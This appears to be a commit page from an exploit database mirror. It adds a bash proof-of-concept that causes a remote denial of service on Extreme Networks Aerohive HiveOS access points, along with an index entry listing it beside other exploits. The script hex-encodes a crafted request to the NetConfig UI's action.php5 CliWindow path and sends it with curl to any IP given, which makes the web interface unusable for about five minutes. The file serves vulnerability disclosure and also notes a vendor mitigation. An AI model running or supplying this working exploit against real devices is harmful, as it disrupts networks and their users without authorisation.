DB: 2020-05-09
1 changes to exploits/shellcodes Extreme Networks Aerohive HiveOS 11.0 - Remote Denial of Service (PoC)
This commit is contained in:
parent
c1eb769a98
commit
262c9c3eb6
2 changed files with 70 additions and 0 deletions
69
exploits/hardware/dos/48441.sh
Executable file
69
exploits/hardware/dos/48441.sh
Executable file
|
@ -0,0 +1,69 @@
|
|||
# Exploit title : Extreme Networks Aerohive HiveOS 11.0 - Remote Denial of Service (PoC)
|
||||
# Exploit Author : LiquidWorm
|
||||
# Date : 2020-05-06
|
||||
# Vendor: Extreme Networks
|
||||
# Product web page: https://www.extremenetworks.com
|
||||
# Datasheet: https://www.aerohive.com/wp-content/uploads/Aerohive_Datasheet_HiveOS.pdf
|
||||
# Affected version: <=11.x
|
||||
|
||||
#!/bin/bash
|
||||
#
|
||||
#
|
||||
# Extreme Networks Aerohive HiveOS <=11.x Remote Denial of Service Exploit
|
||||
#
|
||||
#
|
||||
# Vendor: Extreme Networks
|
||||
# Product web page: https://www.extremenetworks.com
|
||||
# Datasheet: https://www.aerohive.com/wp-content/uploads/Aerohive_Datasheet_HiveOS.pdf
|
||||
# Affected version: <=11.x
|
||||
#
|
||||
# Summary: Aerohive HiveOS is the network operating system that powers
|
||||
# all Aerohive access points, based on a feature-rich Cooperative Control
|
||||
# architecture. HiveOS enables Aerohive devices to organize into groups,
|
||||
# or 'hives', which allows functionality like fast roaming, user-based
|
||||
# access control and fully stateful application-aware firewall policies,
|
||||
# as well as additional security and RF networking features - all without
|
||||
# the need for a centralized or dedicated controller.
|
||||
#
|
||||
# Desc: An unauthenticated malicious user can trigger a Denial of Service
|
||||
# (DoS) attack when sending specific application layer packets towards the
|
||||
# Aerohive NetConfig UI. This PoC exploit renders the application unusable
|
||||
# for 305 seconds or 5 minutes with a single HTTP request using the action.php5
|
||||
# script calling the CliWindow function thru the _page parameter, denying
|
||||
# access to the web server hive user interface.
|
||||
#
|
||||
# Vendor mitigation:
|
||||
# CLI> no system web-server hive-ui enable
|
||||
#
|
||||
# Tested on: Hiawatha v9.6
|
||||
#
|
||||
#
|
||||
# Vulnerability discvered by Gjoko 'LiquidWorm' Krstic
|
||||
# @zeroscience
|
||||
#
|
||||
#
|
||||
# Advisory ID: ZSL-2020-5566
|
||||
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5566.php
|
||||
#
|
||||
#
|
||||
# 05.12.2019
|
||||
#
|
||||
|
||||
if [ "$#" -ne 1 ]; then
|
||||
echo -ne "\nUsage: $0 [ipaddr]\n\n"
|
||||
exit
|
||||
fi
|
||||
|
||||
IP=$1
|
||||
|
||||
SBYTES=`echo -e \
|
||||
"\x61\x63\x74\x69\x6f\x6e\x2e"\
|
||||
"\x70\x68\x70\x35\x3f\x5f\x70"\
|
||||
"\x61\x67\x65\x3d\x43\x6c\x69"\
|
||||
"\x57\x69\x6e\x64\x6f\x77\x26"\
|
||||
"\x5f\x61\x63\x74\x69\x6f\x6e"\
|
||||
"\x3d\x67\x65\x74\x26\x5f\x61"\
|
||||
"\x63\x74\x69\x6f\x6e\x54\x79"\
|
||||
"\x70\x65\x3d\x31"`##_000000251
|
||||
|
||||
curl -vk "https://$IP/$SBYTES" --user-agent "Profesorke/Dzvoneshe"
|
|
@ -6731,6 +6731,7 @@ id,file,description,date,author,type,platform,port
|
|||
48342,exploits/hardware/dos/48342.txt,"Cisco IP Phone 11.7 - Denial of service (PoC)",2020-04-17,"Jacob Baines",dos,hardware,
|
||||
48402,exploits/windows/dos/48402.py,"VirtualTablet Server 3.0.2 - Denial of Service (PoC)",2020-05-01,"Dolev Farhi",dos,windows,
|
||||
48434,exploits/windows/dos/48434.py,"FlashGet 1.9.6 - Denial of Service (PoC)",2020-05-07,"Milad karimi",dos,windows,
|
||||
48441,exploits/hardware/dos/48441.sh,"Extreme Networks Aerohive HiveOS 11.0 - Remote Denial of Service (PoC)",2020-05-08,LiquidWorm,dos,hardware,
|
||||
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
||||
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
|
||||
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue